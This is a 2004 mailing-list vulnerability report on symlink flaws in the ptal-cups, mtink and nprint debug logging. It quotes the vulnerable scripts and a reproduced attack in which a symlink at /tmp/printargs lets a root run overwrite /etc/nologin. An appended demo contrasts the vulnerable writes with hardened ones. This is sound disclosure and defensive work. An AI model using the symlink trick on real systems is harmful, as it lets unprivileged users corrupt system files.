From: <sha...@ya...> - 2004-03-20 17:23:53
Hello list,

---

This is my first post to the list, so please excuse me if I have posted to the wrong list, or if I miss out any information in the bug report.

---

I have discovered potential security issues in the ptal cups backend script, nprint script and mtink script, usually found in /usr/lib/cups/backend or otherwise. The issues are symlink vulnerabilities, and are due to insecure file handling.

From /usr/lib/cups/backend/ptal (linked to /usr/bin/ptal-cups):

---
[...]
#DEBUG=true

### Where we log debug stuff to:
DEBUG_PRINTARGS=/tmp/printargs
DEBUG_PRINTOUT=/tmp/printout

if [ -n "$DEBUG" ]; then
    echo "Args: $0 $*" > $DEBUG_PRINTARGS
    echo "Arg1: $1" >> $DEBUG_PRINTARGS
    echo "Arg2: $2" >> $DEBUG_PRINTARGS
    echo "Arg3: $3" >> $DEBUG_PRINTARGS
    echo "Arg4: $4" >> $DEBUG_PRINTARGS
    echo "Arg5: $5" >> $DEBUG_PRINTARGS
    echo "Arg6: $6" >> $DEBUG_PRINTARGS
    echo "Arg7: $7" >> $DEBUG_PRINTARGS
    command -V ptal-device >> $DEBUG_PRINTARGS 2>&1
    command -V ptal-devid >> $DEBUG_PRINTARGS 2>&1
    command -V ptal-connect >> $DEBUG_PRINTARGS 2>&1
    command -V basename >> $DEBUG_PRINTARGS 2>&1
    command -V cat >> $DEBUG_PRINTARGS 2>&1
    declare >> $DEBUG_PRINTARGS
fi
[...]
if [ -n "$DEBUG" ]; then
    echo "SENDTO: $SENDTO" >> $DEBUG_PRINTARGS
    cat $FILE > $DEBUG_PRINTOUT
    FILE=$DEBUG_PRINTOUT
fi
[...]
---

In various instances, 'echo' invocations are called in the script to write debugging information to /tmp/printargs ONLY IF DEBUGGING IS ENABLED (if DEBUG is set). However, no file checks are performed on /tmp/printargs for symlinks or otherwise an existence of the file - this is a recipe for trouble, as an attacker could simply create a symlink called /tmp/printargs to a sensitive system file, and if debugging in the script is enabled, the system file *will* be corrupted.

Exactly the same vulnerability exists in the mtink and nprint scripts. As seen below:

--- mtink script fragment ---
[...]
### Uncomment for crude debugging output
# DEBUG=true

### Where we log debug stuff to:
DEBUG_PRINTARGS=/tmp/printargs
DEBUG_PRINTOUT=/tmp/printout

if [ -n "$DEBUG" ]; then
    echo "Args: $0 $*" > $DEBUG_PRINTARGS
    echo "Arg1: $1" >> $DEBUG_PRINTARGS
    echo "Arg2: $2" >> $DEBUG_PRINTARGS
    echo "Arg3: $3" >> $DEBUG_PRINTARGS
    echo "Arg4: $4" >> $DEBUG_PRINTARGS
    echo "Arg5: $5" >> $DEBUG_PRINTARGS
    echo "Arg6: $6" >> $DEBUG_PRINTARGS
    echo "Arg7: $7" >> $DEBUG_PRINTARGS
    command -V basename >> $DEBUG_PRINTARGS 2>&1
    command -V cat >> $DEBUG_PRINTARGS 2>&1
    declare >> $DEBUG_PRINTARGS
fi
[...]
if [ -n "$DEBUG" ]; then
    echo "SENDTO: $SENDTO" >> $DEBUG_PRINTARGS
    cat $FILE > $DEBUG_PRINTOUT
    FILE=$DEBUG_PRINTOUT
fi
[...]
--- EOF

And in the nprint script:

--- nprint script fragment ---
[...]
### Uncomment for crude debugging output
#DEBUG=true

if [ ! -z "$DEBUG" ]; then
    echo "Args: $0 $*" > /tmp/printargs
    echo "Arg1: $1" >> /tmp/printargs
    echo "Arg2: $2" >> /tmp/printargs
    echo "Arg2: $3" >> /tmp/printargs
    echo "Arg2: $4" >> /tmp/printargs
    echo "Arg2: $5" >> /tmp/printargs
    echo "Arg2: $6" >> /tmp/printargs
    echo "Arg2: $7" >> /tmp/printargs
    command -V pqlist >> /tmp/printargs 2>&1
    command -V nprint >> /tmp/printargs 2>&1
    command -V basename >> /tmp/printargs 2>&1
    command -V cat >> /tmp/printargs 2>&1
    declare -p >> /tmp/printargs
    echo "pqlist\n------" >> /tmp/printargs
    pqlist >> /tmp/printargs
fi
[...]
if [ ! -z "$DEBUG" ]; then
    echo "SENDTO: $SENDTO" >> /tmp/printargs
    cat $6 > /tmp/printout
    cat /tmp/printout | nprint -q $SENDTO -
else
    cat $FILE | nprint -q $SENDTO -
fi
[...]
--- EOF

Below, I will demonstrate how I can reproduce the potential vulnerability using the ptal-cups (/usr/lib/cups/backend/ptal) script. This is a genuine example attack I performed on my Mandrake Linux system:

--- attack ---
[shaun@localhost shaun]$ ln -s /etc/nologin /tmp/printargs
[...]
[root@localhost backend]# export DEBUG=true
[root@localhost backend]# ptal-cups direct ptal-cups:/mlc:usb:PHOTOSMART_P1000 "HEWLETT-PACKARD PHOTOSMART P1000" "PTAL mlc:usb:PHOTOSMART_P1000"
[root@localhost backend]#
[...]
[shaun@localhost shaun]$ cat /etc/nologin
Args: /usr/sbin/ptal-cups
Arg1:
Arg2:
Arg3:
Arg4:
Arg5:
Arg6:
Arg7:
ptal-device is /usr/bin/ptal-device
ptal-devid is /usr/bin/ptal-devid
ptal-connect is /usr/bin/ptal-connect
basename is /bin/basename
cat is /bin/cat
BASH=/bin/bash
BASH_VERSINFO=([0]="2" [1]="05b" [2]="0" [3]="1" [4]="release" [5]="i586-mandrake-linux-gnu")
BASH_VERSION='2.05b.0(1)-release'
BROWSER=/usr/bin/mozilla
COLORTERM=
DEBUG=true
DEBUG_PRINTARGS=/tmp/printargs
DEBUG_PRINTOUT=/tmp/printout
DIRSTACK=()
DISPLAY=:0.0
ENV=/root/.bashrc
EUID=0
GDK_USE_XFT=1
GNOME_DISABLE_CRASH_DIALOG=1
GROUPS=()
G_BROKEN_FILENAMES=1
HELP_BROWSER=/usr/bin/mozilla
HISTCONTROL=ignoredups
HISTSIZE=1000
HOME=/root
HOSTNAME=localhost.localdomain
HOSTTYPE=i586
IFS=$' \t\n'
INPUTRC=/etc/inputrc
KONSOLE_DCOP='DCOPRef(konsole-1482,konsole)'
KONSOLE_DCOP_SESSION='DCOPRef(konsole-1482,session-3)'
LANG=en_GB
LANGUAGE=en_GB:en
LC_COLLATE=en_GB
LC_CTYPE=en_GB
LC_MESSAGES=en_GB
LC_MONETARY=en_GB
LC_NUMERIC=en_GB
LC_TIME=en_GB
LESS=-MM
LESSKEY=/etc/.less
LESSOPEN='|/usr/bin/lesspipe.sh %s'
LOGNAME=shaun
LS_COLORS='no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.tbz2=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lha=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:*.tiff=01;35:'
MACHTYPE=i586-mandrake-linux-gnu
MAIL=/var/spool/mail/shaun
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/local/sbin:/usr/bin:/bin:/usr/bin:/usr/local/bin
PIPESTATUS=([0]="0")
PPID=4548
PS4='+ '
PWD=/usr/lib/cups/backend
QT_XFT=0
SECURE_LEVEL=2
SHELL=/bin/bash
SHELLOPTS=braceexpand:hashall:interactive-comments
SHLVL=4
TERM=xterm
UID=0
USER=shaun
USERNAME=root
XAUTHORITY=/home/shaun/.Xauthority
XDM_MANAGED=/var/run/xdmctl/xdmctl-:0,maysd,mayfn,sched
XMODIFIERS=@im=none
_=cat
MFG:HEWLETT-PACKARD;MDL:PHOTOSMART P1000;CMD:MLC,PCL,PML;CLASS:PRINTER;DESCRIPTION:Hewlett-Packard PhotoSmart P1000;SERN:ES16C1907ZHP;VSTATUS:$HB0$NC0,ff,DN,IDLE,CUT,K0,C3,SM,NR,KP041,CP000;VP:0800,FL,B0;VJ: ;
[...]
--- EO attack

As can be seen above, I created a link from /tmp/printargs, enabled debugging as root (I could've also uncommented the "#DEBUG=true" line in the ptal backend), and ran the ptal-cups script as root. Then, I tested if the attack had worked, by checking the contents of /etc/nologin - it had clearly written to /etc/nologin.

BTW, the vulnerability only exists if debugging is enabled, by setting the DEBUG variable to non-null. However, I am betting that at least a few people in the world have debugging enabled in ptal-cups, nprint or the mtink script. If debugging is enabled, the consequences could be quite severe. In my opinion, this is most definitely a security issue.

**** My system:
---
[shaun@localhost shaun]$ uname --al
Linux localhost.localdomain 2.4.19-16mdk #1 Fri Sep 20 18:15:05 CEST 2002 i686 unknown unknown GNU/Linux
[shaun@localhost shaun]$
---
****

A suggested fix for this is to check for the existence of /tmp/printargs and /tmp/printout before writing to them. Maybe use a 'if [ -e ...]' type statement.

If anybody needs more info, don't hesitate to ask :)

How many people here have debugging enabled in their ptal-cups, nprint and mtink scripts, BTW?

Thank you for your time.

Shaun.
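The following is an added example, not code from the post above nor from the ptal-cups, mtink or nprint scripts. It reproduces the write described in the post (a fixed debug-log name in a world-writable directory, replaced by an attacker's symlink, overwritten by the privileged script) inside a scratch directory, and puts a hardened version next to it. The scratch directory, the "sensitive" file standing in for /etc/nologin, the log path standing in for /tmp/printargs, and the function names are all constructed for the demonstration. The hardened version creates the log file atomically with mktemp rather than testing for the name and then writing to it, so there is no interval between a check and the write in which the name can be swapped; a second variant shows what to do if the fixed name must be kept.

```shell
#!/bin/sh
# Added example (not from the original post or the ptal/mtink/nprint scripts).
# Everything below lives in a scratch directory created here; the "sensitive"
# file, the debug-log path and the attacker's symlink are constructed stand-ins
# for /etc/nologin and /tmp/printargs.

SCRATCH=$(mktemp -d) || exit 1
trap 'rm -rf "$SCRATCH"' EXIT
TARGET="$SCRATCH/nologin"       # stands in for /etc/nologin
DEBUGLOG="$SCRATCH/printargs"   # stands in for the fixed /tmp/printargs name

printf 'original contents\n' > "$TARGET"
ln -s "$TARGET" "$DEBUGLOG"     # the attacker's move: plant a symlink at the fixed name

# Vulnerable pattern, the same shape as the quoted backends: ">" on a fixed,
# attacker-controllable name. open(2) follows the symlink and truncates TARGET.
debug_write_vulnerable() {
    echo "Args: $*" > "$DEBUGLOG"
    echo "Arg1: $1" >> "$DEBUGLOG"
}

# Hardened pattern: mktemp creates a fresh file (O_CREAT|O_EXCL, mode 0600)
# under a unique name, so nothing an attacker pre-planted is reused and there
# is no check-then-write window. Prints the path it wrote so the caller can
# keep using it (as the backends do with DEBUG_PRINTOUT).
debug_write_safe() {
    logfile=$(mktemp "$SCRATCH/printargs.XXXXXX") || return 1
    echo "Args: $*" > "$logfile"
    echo "Arg1: $1" >> "$logfile"
    printf '%s\n' "$logfile"
}

# If the fixed name really must be kept, write it under noclobber (set -C):
# ">" then refuses an existing file, or a symlink to one, instead of following
# it. Returns non-zero when the write was refused.
debug_write_fixed_name() {
    ( set -C; echo "Args: $*" > "$DEBUGLOG" ) 2>/dev/null
}

# Helpers so the outcome can be inspected.
target_first_line() { sed -n 1p "$TARGET"; }
reset_target() { printf 'original contents\n' > "$TARGET"; }
```

Run as-is, debug_write_vulnerable clobbers the stand-in for /etc/nologin through the symlink, debug_write_safe leaves it untouched and writes a freshly created file, and debug_write_fixed_name fails rather than following the link. Any script that keeps a fixed path under /tmp should also run with a restrictive umask and, where the kernel offers it, benefit from protected_symlinks; neither replaces creating the file exclusively.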